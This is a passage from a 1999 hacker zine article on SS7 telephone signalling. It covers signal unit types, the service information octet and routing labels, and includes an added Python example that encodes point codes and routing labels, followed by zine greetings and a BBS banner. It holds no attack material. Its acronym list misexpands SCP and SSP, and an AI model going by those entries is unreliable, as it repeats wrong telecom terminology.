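FISU and an LSSU are told apart purely by the length indicator, the framed
bit stream contains the flag pattern only where the flags are, and flipping
one bit in a signal unit makes decode_su reject it.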

13. What are the Functions of the Different Signaling Units?

FISUs themselves have no information payload. Their purpose is to occupy the
link at those times when there are no LSSUs or MSUs to send. Because they
undergo error checking, FISUs facilitate the constant monitoring of link
quality in the absence of signaling traffic. FISUs can also be used to
acknowledge the receipt of messages using the backwards sequence number and
backwards indicator bit.

LSSUs are used to communicate information about the signaling link between
the nodes on either end of the link. This information is contained in the
status field of the SU (see Figure 8). Because the two ends of a link are
controlled by independent processors, there is a need to provide a means for
them to communicate. LSSUs provide the means for performing this function.
LSSUs are used primarily to signal the initiation of link alignment, the
quality of received signaling traffic, and the status of the processors at
either end of the link. Because they are sent only between the signaling
points at either end of the link, LSSUs do not require any addressing
information.

MSUs are the workhorses of the SS7 network. All signaling associated with
call setup and tear down, database query and response, and SS7 network
management takes place using MSUs. MSUs are the basic envelope within which
all addressed signaling information is placed. As will be shown below, there
are several different types of MSUs. All MSUs have certain fields in common.
Other fields differ according to the type of message. The type of MSU is
indicated in the service-information octet shown in Figure 8; the addressing
and informational content of the MSU is contained in the signaling
information field.


14. Message Signal Unit Structure

The functionality of the message signal unit lies in the actual content of
the service information octet and the signaling information field (see Figure
8).

The service information octet is an 8-bit field (as might be inferred from
its name) that contains three types of information as follows:

1.Four bits are used to indicate the type of information contained in the
signaling information field. They are referred to as the service indicator.
The values most commonly used in American networks are outlined in Table 2.

Table 2: Common Service Indicator Values


Value Function

0 Signaling Network Management
1 Signaling Network Testing and Maintenance
3 Signaling Connection Control Part (SCCP)
5 ISDN User Part (ISUP)


2.Two bits are used to indicate whether the message is intended (and coded)
  for use in a national or international network. They are generally coded
  with a value of 2, national network.

3.The remaining 2 bits are used (in American networks) to identify a message
priority, from 0 to 3, with 3 being the highest priority. Message
priorities do not control the order in which messages are transmitted; they
are only used in cases of signaling network congestion. In that case, they
indicate whether a message has sufficient priority to merit transmission
during an instance of congestion and/or whether it can be discarded en
route to a destination.

The format of the contents of the signaling information field is determined
by the service indicator. (Within user parts, there are further distinctions
in message formats, but the service indicator provides the first piece of
information necessary for routing and/or decoding the message.)

The first portion of the signaling information field is identical for all
MSUs currently in use. It is referred to as the routing label. Simply stated,
the routing label identifies the message originator, the intended destination
of the message, and a field referred to as the signaling-link selection field
which is used to distribute message traffic over the set of possible links
and routes. The routing label consists of 7 octets that are outlined below in
Table 3 (in order of transmission):

Table 3: Routing Label


Octet Group                   Function                                 Octets

Destination Point Code (DPC)  Contains the address of the node to      3
                              which the message is being sent
Originating Point Code (OPC)  Contains the address of the message      3
                              originator
Signaling Link Selection      Distributes load among redundant routes  1
(SLS)


Point codes consist of the three-part identifier (network #, cluster #,
member #), which uniquely identifies a signaling point.
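
The service information octet, the routing label and the three-level point
code of section 11 are small enough to encode and decode in full. This is an
added example, not the article's code: the service indicator occupies the low
four bits of the SIO, the priority the next two and the network indicator the
top two (so the "national network" value 2 lands in bits 6-7); each point code
is three octets sent member octet first, which is the ANSI T1.111 octet order
and is an assumption of this example; network numbers 0 and 255 are rejected
as unassignable per the text above. Point codes and user data are constructed.

```python
"""MSU service information octet and routing label with ANSI point codes
(added example)."""

SERVICE_INDICATORS = {0: "SNM", 1: "SNT", 3: "SCCP", 5: "ISUP"}   # Table 2


def encode_sio(si, priority=0, network_indicator=2):
    """SI in bits 0-3, priority in bits 4-5, network indicator in bits 6-7."""
    if not (0 <= si <= 15 and 0 <= priority <= 3 and 0 <= network_indicator <= 3):
        raise ValueError("SIO field out of range")
    return (network_indicator << 6) | (priority << 4) | si


def decode_sio(octet):
    return {"si": octet & 0x0F, "priority": (octet >> 4) & 3, "ni": octet >> 6}


def encode_point_code(network, cluster, member):
    """network-cluster-member, each 0..255; network 0 is not assignable and
    255 is reserved. Octets go out least significant (member) first."""
    for part in (network, cluster, member):
        if not 0 <= part <= 255:
            raise ValueError("point code field out of range")
    if network in (0, 255):
        raise ValueError("network number %d is not assignable" % network)
    return bytes([member, cluster, network])


def decode_point_code(octets):
    member, cluster, network = octets
    return (network, cluster, member)


def format_point_code(pc):
    return "%d-%d-%d" % pc


def encode_routing_label(dpc, opc, sls):
    if not 0 <= sls <= 255:
        raise ValueError("SLS out of range")
    return encode_point_code(*dpc) + encode_point_code(*opc) + bytes([sls])


def decode_routing_label(sif):
    """The routing label is the first 7 octets of the signaling information field."""
    if len(sif) < 7:
        raise ValueError("SIF shorter than a routing label")
    return {"dpc": decode_point_code(sif[0:3]), "opc": decode_point_code(sif[3:6]),
            "sls": sif[6], "user_data": sif[7:]}


def select_link(sls, links):
    """Spread traffic over the links (or routes) available using the SLS."""
    return links[sls % len(links)]


def build_msu_payload(si, dpc, opc, sls, user_data, priority=0):
    """SIO + SIF: everything between the length indicator and the check bits."""
    return bytes([encode_sio(si, priority)]) + encode_routing_label(dpc, opc, sls) + user_data


def parse_msu_payload(payload):
    sio = decode_sio(payload[0])
    label = decode_routing_label(payload[1:])
    return {"service": SERVICE_INDICATORS.get(sio["si"], "other"), **sio, **label}
```

A national ISUP message of priority 1 gets SIO 0x95; the label for DPC
245-10-3 and OPC 245-10-1 with SLS 7 goes on the wire as 03 0A F5 01 0A F5 07,
and SLS 7 sends it out over the second of two A links while SLS 6 uses the
first.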


16. Acronym List


ACM Address Complete Message
ANM Answer Message
A Links Access Links
BIB Backward Indicator Bit
B Links Bridge Links
BSN Backward Sequence Number
D Links Diagonal Links
DPC Destination Point Code
E Link Extended Link
F Link Fully Associated Link
FIB Forward Indicator Bit
FISU Fill in Signal Unit
FSN Forward Sequence Number
IAM Initial Address Message
ISDN Integrated Services Digital Network
ISUP ISDN User Part
kbps Kilobits per Second
LSSU Link Status Signal Unit
MF Multifrequency
MSU Message Signal Unit
MTP Message Transfer Part
OMAP Operations, Maintenance and Administration Part
OPC Originating Point Code
PSTN Public Switched Telephone Network
RBOC Regional Bell Operating Company
REL Release Message
RLC Release Complete Message
RSP Route Set Prohibited Test Message
RSR Route Set Restricted Test Message
SS7 Signaling System 7
SCCP Signaling Connection Control Part
SCP Signal Control Point
SLS Signaling Link Selection
SSP Signal Switching Point
STP Signal Transfer Point
SU Signal Unit
TCAP Transaction Capabilities Application Part
TFA Transfer Allowed Message
TFP Transfer Prohibited Message
TFR Transfer Restricted Message


Well, that's it. Shouts to d4rkcyde, 9x, b4b0, eVolution, downt1me, elf,
substance, lowtek, digiphreak, gr1p, t1p, euk. darkcyde.8m.com.

[----> ghost in the shell bbs <----]
[----> o11 +44 (o)1xxx xxxxxx <----]
[----> 24 hours. d4rkcyde (c) <----]

g1ts.login:


---(OOooOO)--------Outness----------------------------------------------(OOo-
---(OOooOO)-------------------------------------------------------------(OOo-
---(OOooOO)-------------------------------------------------------------(OOo-


Werd, that's it for this issue. Thanks to everyone who submitted shit,
hopefully next issue we'll have even more :> Keep on c0nf1n, k33p drink1ng
l04dz 0f c4fF3n3, be 3l337.



[C] 1999 D4RKCYDE Communications. darkcyde.8m.com #darkcyde EfNet.



